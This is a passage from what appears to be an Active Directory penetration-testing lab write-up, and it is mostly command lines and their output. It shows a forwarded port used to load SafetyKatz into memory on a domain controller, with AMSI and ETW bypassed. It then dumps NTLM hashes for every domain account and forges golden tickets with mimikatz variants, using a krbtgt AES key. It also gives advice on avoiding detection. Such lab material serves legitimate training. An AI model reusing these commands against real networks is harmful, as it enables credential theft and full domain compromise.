6DUPcxEpM0wKjhIYZwsggwEHwpE/lIcAs+HepUp0Jp8U/WuAbEvXA9nSmDVgaY6PvinUL66UFVafMZem
WGmPWIBFwbn3jylQvQ+HGRdzS1vjXnmhnjQNe4sLDbnqgodV35QLxt1ucuDQ+QnnD/F7RlWTrrml3B3B
MLxvuKk36kKcDjIU2Vu3Ly787U4BnF8fV3+TZ+3zVE+BhsXx6F0MGljWLwcgo3Y/imx5C3mXPz+NRG20
kXyDxtoTh1/saq4WBRR+eeLhCGmPcMA88sfCTsC39NFUaVZJtsFHI/vOuJONH2ZHR70CBpUHhYbgOE0D
QlK9OqNs5bn7DRX66TqShnfEcYaEFwjJV+OVK/6BHgn1+Q6H9Q/T7m40hKU8xR6sXx7syGr1LVBomTBc
RZyX8Cdj8lPAAvGvDbTkTWF8Ts0eOWRGV4KtQ5k/5L7kwKMvDaPKw9/aZ6e/1JjSgdaM2SqIDTIhNaRF
oTKyfda1bamXDP2bvs2Q1DNhXRBkH6wqB9wLp/LrDNEIHYDOqT+wEhweA2Fu5Cw7PlQLDOPR4Sx4d6z5
CdV5LvbKTPw9GDktyebvqfwBTQ/l73/sO8W440gHFs3K8ZBwHExBUgsQaai3YOrJlKMadbIbW7+b2j18
RzXb7g3uw34IzlRGFG6xiZtHSUStt703bmQlAx7CVv2hBVL3jLg2+0tko4xNEg3r+E8ZIaPyYQcJxUtg
+n/p6GDO2uDBVfpkdbllssqheKGWpHBGqTvEYnB6ex+MmMJCx+nf+LH/BXgeZ34zAzZ8t0a7KqDg1spK
IztKv6EOom+I9LdXdN1L93b4TDlzAy1hcK9rD86EPiZZxzkxeGo0hHN97TFiN4x+bNN/0Jaw0E94zOW0
gkx6R6sqGx7cVHDNodnATMu9CtPD70Rn56SvEHR5Rw7ZvVw/910lvw/vqjqvqLk425KHW3iTECRO0WN3
+XdcXASKQhJ//hFN55RAKua8MVUds72xS+Gwf4+srx82KGOFiCdkATqp+6nIekqUhOYflJO7nlxYSNh6
bs998exyZg4beB++Kgpr4EYA0dxFK9Fxv+lJbA0V7L1bvyYHpAkK3LmVKOvCI0hkx4HrWNBtg8swKEZi
nNUHo4IBEzCCAQ+gAwIBAKKCAQYEggECfYH/MIH8oIH5MIH2MIHzoCswKaADAgESoSIEIClQ7L5Z71/Q
XuurNfS09MXvOU8jKai2xUJf+k7/qmLpoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohUwE6AD
AgEBoQwwChsIc3ZjYWRtaW6jBwMFAEDhAAClERgPMjAyNDA2MjgxMDI3MTFaphEYDzIwMjQwNjI4MjAy
NzExWqcRGA8yMDI0MDcwNTEwMjcxMVqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMC
AQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FM
[*] Target LUID: 0xb9e0d8
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/28/2024 3:27:11 AM
EndTime : 6/28/2024 1:27:11 PM
RenewTill : 7/5/2024 3:27:11 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : KVDsvlnvX9Be66s19LT0xe85TyMpqLbFQl/6Tv+qYuk=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new Command Prompt opens with Admin privileges. We will copy the loader.exe to dcorp-dc.
C:\Windows\system32>xcopy /y C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\
C:\AD\Tools\Loader.exe
1 File(s) copied

Now we will create a rule for the port redirection. Any traffic on port 8080 in dcorp-dc is routed to port
80 on our student machine. And then we execute SafetyKatz.exe in the memory.
C:\Windows\system32>winrs -r:dcorp-dc cmd.exe
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\svcadmin>cd C:\Users\Public
cd C:\Users\Public

C:\Users\Public>dir
dir
Volume in drive C has no label.
Volume Serial Number is 1A5A-FDE2

Directory of C:\Users\Public

05/18/2024 03:39 AM <DIR> .

05/18/2024 01:32 AM <DIR> ..
11/10/2022 10:51 PM <DIR> Documents
05/08/2021 01:20 AM <DIR> Downloads
11/16/2022 05:28 AM 64,512 Loader.exe
05/08/2021 01:20 AM <DIR> Music
05/08/2021 01:20 AM <DIR> Pictures
04/20/2024 04:35 AM 331 Safety.bat
05/08/2021 01:20 AM <DIR> Videos
2 File(s) 64,843 bytes
7 Dir(s) 6,447,775,744 bytes free

C:\Users\Public>winrs -r:dcorp-dc "netsh interface portproxy add v4tov4 listenport=8080

listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.163"
winrs -r:dcorp-dc "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0
connectport=80 connectaddress=172.16.100.163"

C:\Users\Public>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args

"lsadump::lsa /patch" "exit"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::lsa /patch"
"exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : http://127.0.0.1:8080/SafetyKatz.exe Arguments : lsadump::lsa /patch exit

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -path
ERROR mimikatz_doLocal ; "-path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
 hostname - Displays system local hostname

mimikatz(commandline) # http://127.0.0.1:8080/SafetyKatz.exe
ERROR mimikatz_doLocal ; "http://127.0.0.1:8080/SafetyKatz.exe" command of "standard" module not
found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # -args
ERROR mimikatz_doLocal ; "-args" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::lsa /patch

Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID : 000001f4 (500)

User : Administrator
LM :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID : 000001f5 (501)

User : Guest
LM :
NTLM :

RID : 000001f6 (502)

User : krbtgt
LM :
NTLM : 4e9815869d2090ccfca61c1fe0d23986
RID : 00000459 (1113)
User : sqladmin
LM :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID : 0000045a (1114)

User : websvc
LM :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID : 0000045b (1115)

User : srvadmin
LM :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID : 0000045d (1117)

User : appadmin
LM :
NTLM : d549831a955fee51a43c83efb3928fa7

RID : 0000045e (1118)

User : svcadmin
LM :
NTLM : b38ff50264b74508085d82c69794a4d8

RID : 0000045f (1119)

User : testda
LM :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID : 00000460 (1120)

User : mgmtadmin
LM :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID : 00000461 (1121)

User : ciadmin
LM :
NTLM : e08253add90dccf1a208523d02998c3d

RID : 00000462 (1122)

User : sql1admin
LM :
NTLM : e999ae4bd06932620a1e78d2112138c6

RID : 00001055 (4181)

User : studentadmin
LM :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID : 00003521 (13601)

User : student161
LM :
NTLM : 12fe951ecdce0ee2edd5a4d71a0d6e0b

RID : 00003522 (13602)

User : student162
LM :
NTLM : 2230beda3bcd55b72cc4c1a5ef8170e9
RID : 00003523 (13603)
User : student163
LM :
NTLM : ccbca8c20310dbc0c5c9dcf1fde108b8

RID : 00003524 (13604)

User : student164
LM :
NTLM : 55e3baaf40c19d73f46b601d3cbfd41b

RID : 00003525 (13605)

User : student165
LM :
NTLM : a42ea87cc59018a3b49ec5d9be31a646

RID : 00003526 (13606)

User : student166
LM :
NTLM : 24b141d31352ea4f12745579e4885756

RID : 00003527 (13607)

User : student167
LM :
NTLM : 5ea118645828dcab565bf5895ca4ea57

RID : 00003528 (13608)

User : student168
LM :
NTLM : 53171b516f11d8b38e9fb0572014ba55

RID : 00003529 (13609)

User : student169
LM :
NTLM : 5a231022659299b4a1f2d1651d1c5106

RID : 0000352a (13610)

User : student170
LM :
NTLM : 9b0a73646f1fab4f0321f4526f3ed8f1

RID : 0000352b (13611)

User : student171
LM :
NTLM : 83c26fe5a55558897267fdf9a0d91d0d

RID : 0000352c (13612)

User : student172
LM :
NTLM : 1c0175bcef53648c75a88d566d2df3da

RID : 0000352d (13613)

User : student173
LM :
NTLM : de2a9206f558dddf3ded7b5f3427182c

RID : 0000352e (13614)

User : student174
LM :
NTLM : 6c22f89d3c33d5d260f195be679212b3

RID : 0000352f (13615)

User : student175
LM :
NTLM : 2c102014852ffa9959434ac02dc0fecd

RID : 00003530 (13616)

User : student176
LM :
NTLM : a8918ce94dcd39974537493be3a4895c

RID : 00003531 (13617)

User : student177
LM :
NTLM : d348e38df9c4883b5f234d83deb038f3

RID : 00003532 (13618)

User : student178
LM :
NTLM : cc4f8e304a59ed00c47a87d42b7c107f

RID : 00003533 (13619)

User : student179
LM :
NTLM : 667598cfb79b5ca955c70afba1606ee2

RID : 00003534 (13620)

User : student180
LM :
NTLM : 2e893c9e2619ca18f0560e732c573eb9

RID : 00003535 (13621)

User : Control161user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003536 (13622)

User : Control162user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003537 (13623)

User : Control163user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003538 (13624)

User : Control164user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003539 (13625)

User : Control165user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353a (13626)

User : Control166user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353b (13627)

User : Control167user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353c (13628)

User : Control168user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353d (13629)

User : Control169user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353e (13630)

User : Control170user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353f (13631)

User : Control171user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003540 (13632)

User : Control172user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003541 (13633)

User : Control173user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003542 (13634)

User : Control174user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003543 (13635)

User : Control175user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003544 (13636)

User : Control176user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003545 (13637)

User : Control177user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003546 (13638)

User : Control178user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003547 (13639)

User : Control179user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003548 (13640)

User : Control180user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003549 (13641)

User : Support161user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354a (13642)

User : Support162user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354b (13643)

User : Support163user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354c (13644)

User : Support164user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354d (13645)

User : Support165user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354e (13646)

User : Support166user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354f (13647)

User : Support167user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003550 (13648)

User : Support168user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003551 (13649)

User : Support169user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003552 (13650)
User : Support170user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003553 (13651)

User : Support171user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003554 (13652)

User : Support172user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003555 (13653)

User : Support173user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003556 (13654)

User : Support174user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003557 (13655)

User : Support175user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003558 (13656)

User : Support176user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003559 (13657)

User : Support177user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355a (13658)

User : Support178user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355b (13659)

User : Support179user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355c (13660)

User : Support180user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355d (13661)

User : VPN161user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881
RID : 0000355e (13662)
User : VPN162user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355f (13663)

User : VPN163user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003560 (13664)

User : VPN164user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003561 (13665)

User : VPN165user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003562 (13666)

User : VPN166user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003563 (13667)

User : VPN167user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003564 (13668)

User : VPN168user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003565 (13669)

User : VPN169user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003566 (13670)

User : VPN170user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003567 (13671)

User : VPN171user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003568 (13672)

User : VPN172user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003569 (13673)

User : VPN173user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356a (13674)

User : VPN174user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356b (13675)

User : VPN175user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356c (13676)

User : VPN176user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356d (13677)

User : VPN177user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356e (13678)

User : VPN178user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356f (13679)

User : VPN179user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003570 (13680)

User : VPN180user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 000003e8 (1000)

User : DCORP-DC$
LM :
NTLM : 81a9ccc2f44b988af78448ad78297ad5

RID : 00000451 (1105)

User : DCORP-ADMINSRV$
LM :
NTLM : b5f451985fd34d58d5120816d31b5565

RID : 00000452 (1106)

User : DCORP-APPSRV$
LM :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5

RID : 00000453 (1107)

User : DCORP-CI$
LM :
NTLM : f76f48c176dc09cfd5765843c32809f3

RID : 00000454 (1108)

User : DCORP-MGMT$
LM :
NTLM : 0878da540f45b31b974f73312c18e754

RID : 00000455 (1109)

User : DCORP-MSSQL$
LM :
NTLM : b205f1ca05bedace801893d6aa5aca27

RID : 00000456 (1110)

User : DCORP-SQL1$
LM :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49

RID : 0000106a (4202)

User : DCORP-STDADMIN$
LM :
NTLM : 323e49189b1edbea4a323142017328cb

RID : 00003571 (13681)

User : DCORP-STD161$
LM :
NTLM : 9ef9daa7b4bc99ab3e4121f2abd037c7

RID : 00003572 (13682)

User : DCORP-STD162$
LM :
NTLM : 354a9b4320a227e36d82c19f92851f5b

RID : 00003573 (13683)

User : DCORP-STD163$
LM :
NTLM : 75e1e5ec9a9f15290d40cd1b04fede35

RID : 00003574 (13684)

User : DCORP-STD164$
LM :
NTLM : 9fa111e9828fcb2a53d01dcf8133cc0d

RID : 00003575 (13685)

User : DCORP-STD165$
LM :
NTLM : 565d99510bbbe8fb3e4fa5c9c2120bc5

RID : 00003576 (13686)

User : DCORP-STD166$
LM :
NTLM : 1ab7d20a96b7b4b34e0c806b7631ad8e

RID : 00003577 (13687)

User : DCORP-STD168$
LM :
NTLM : 313fc2c203e17c1a63554c88e090c205

RID : 00003578 (13688)

User : DCORP-STD167$
LM :
NTLM : 69a450cb407f22862f946f22d20db2c2

RID : 00003579 (13689)

User : DCORP-STD169$
LM :
NTLM : ceeab9f5c7798eb9034512934ec115a8

RID : 0000357a (13690)

User : DCORP-STD170$
LM :
NTLM : 1d24dfc4057c69f71576c0cc1e862a17

RID : 0000357b (13691)

User : DCORP-STD171$
LM :
NTLM : 84d9394ef97f221290f257059e8086d0

RID : 0000357c (13692)

User : DCORP-STD172$
LM :
NTLM : 49cc46d9ea5e322232497c21f808ff88

RID : 0000357d (13693)

User : DCORP-STD173$
LM :
NTLM : 323a672db50f9467fde4368c6a60c8d8

RID : 0000357e (13694)

User : DCORP-STD174$
LM :
NTLM : b642781c290b8550a2e9b2661cf87654

RID : 0000357f (13695)

User : DCORP-STD175$
LM :
NTLM : 57f3d186ece9047624b82015fab8d00e

RID : 00003580 (13696)

User : DCORP-STD176$
LM :
NTLM : 79207f3a25b685aa97ea1b34aef53fef

RID : 00003581 (13697)

User : DCORP-STD177$
LM :
NTLM : 2979ebc70dd459e65f8ac3e998aed6b1

RID : 00003582 (13698)

User : DCORP-STD178$
LM :
NTLM : 956164515f0459ea114452437d5ea4d7

RID : 00003583 (13699)

User : DCORP-STD180$
LM :
NTLM : 459c493625fe5994ff309debff15f163

RID : 00003584 (13700)

User : DCORP-STD179$
LM :
NTLM : c9b2183c974b57b61d873026a4443688
RID : 0000044f (1103)
User : mcorp$
LM :
NTLM : a8f73b279dc7257c7a8a2d0c911043d2

RID : 00000450 (1104)

User : US$
LM :
NTLM : 24bfaf8b2a2c17a562ff08f8cf56374f

RID : 00000458 (1112)

User : ecorp$
LM :
NTLM : 60774dcb2e1f27d7a289147ebe2d90c1

mimikatz(commandline) # exit
Bye!

Golden Ticket Attack

A Golden Ticket attack is a powerful technique in which an attacker forges a Ticket Granting Ticket (TGT)
using the Kerberos authentication protocol. This forged TGT allows the attacker to gain unrestricted access
to any service within an Active Directory (AD) environment. A golden ticket is signed and encrypted by the
hash of the KRBTGT account which makes it a valid TGT ticket. The krbtgt user hash could be used to
impersonate any user with any privileges from even a non-domain machine.

Execution
Once we extract the KRBTGT’s hash, either NTLM or AES, we can use it to impersonate any user in the
domain to access any service in the domain.

Using Invoke-Mimi
Invoke-Mimi -Command '"kerberos::golden /User:<user to impersonate> /domain:<Domain Name>
/sid:<Domain SID> /aes256:<NTLM Hash of the krbtgt account> /startoffset:0
/endin:<Ticketlifetime> /renewmax:<Renewaltime> /ptt"'
When AES hash is used, the command is as follows.

Note: The Ticket lifetime and Renewal time should be in accordance with the Domain Kerberos Policy. If
we use default values, then it is considered as an anomaly and easily detected.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Get-DomainSID
S-1-5-21-719815819-3726368948-3917688648
PS C:\Windows\system32> (Get-DomainPolicyData).KerberosPolicy

MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1

PS C:\Windows\system32> ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
ls : Access is denied
At line:1 char:1
+ ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\dcorp-dc.doll...ycorp.local\C$\:String) [Get-
ChildItem], Unauthoriz
edAccessException
+ FullyQualifiedErrorId :
ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

ls : Cannot find path '\\dcorp-dc.dollarcorp.moneycorp.local\C$\' because it does not exist.

At line:1 char:1
+ ls \\dcorp-dc.dollarcorp.moneycorp.local\C$\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\dcorp-dc.doll...ycorp.local\C$\:String) [Get-
ChildItem], ItemNotFound
Exception
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

Running the Golden Ticket attack:

PS C:\Windows\system32> Invoke-Mimi -Command '"kerberos::golden /User:Administrator
/domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500 /groups:512
/startoffset:0 /endin:600 /renewmax:10080 /ptt"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local

/sid:S-1-5-21-719815819-3726368948-3917688648
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500 /groups:512
/startoffset:0 /endin:600 /renewmax:10080 /ptt
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *512
ServiceKey: 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 - aes256_hmac
Lifetime : 6/28/2024 4:33:03 AM ; 6/28/2024 2:33:03 PM ; 7/5/2024 4:33:03 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ dollarcorp.moneycorp.local' successfully submitted for current
session

PS C:\Windows\system32> klist

Current LogonId is 0:0x1a49c2

Cached Tickets: (1)

#0> Client: Administrator @ dollarcorp.moneycorp.local

Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 6/28/2024 5:05:27 (local)
End Time: 6/28/2024 15:05:27 (local)
Renew Time: 7/5/2024 5:05:27 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

PS C:\Windows\system32> ls \\dcorp-dc\C$\

Directory: \\dcorp-dc\C$

Mode LastWriteTime Length Name

---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 11/14/2022 10:12 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 5/18/2024 1:32 AM Users
d----- 1/10/2024 12:59 AM Windows

Klist

Klist command in Windows can be used to view the tickets generated in the system. Here, when we run
klist command we can see that a KRBTGT and an LDAP TGS have been generated and stored in the session.

Using BetterSafetyKatz
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> ls \\dcorp-dc\C$\
ls : Access is denied
At line:1 char:1
+ ls \\dcorp-dc\C$\
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\dcorp-dc\C$\:String) [Get-ChildItem],
UnauthorizedAccessException
+ FullyQualifiedErrorId :
ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

ls : Cannot find path '\\dcorp-dc\C$\' because it does not exist.

At line:1 char:1
+ ls \\dcorp-dc\C$\
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (\\dcorp-dc\C$\:String) [Get-ChildItem],
ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

PS C:\Windows\system32> C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe "kerberos::golden

/User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500
/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
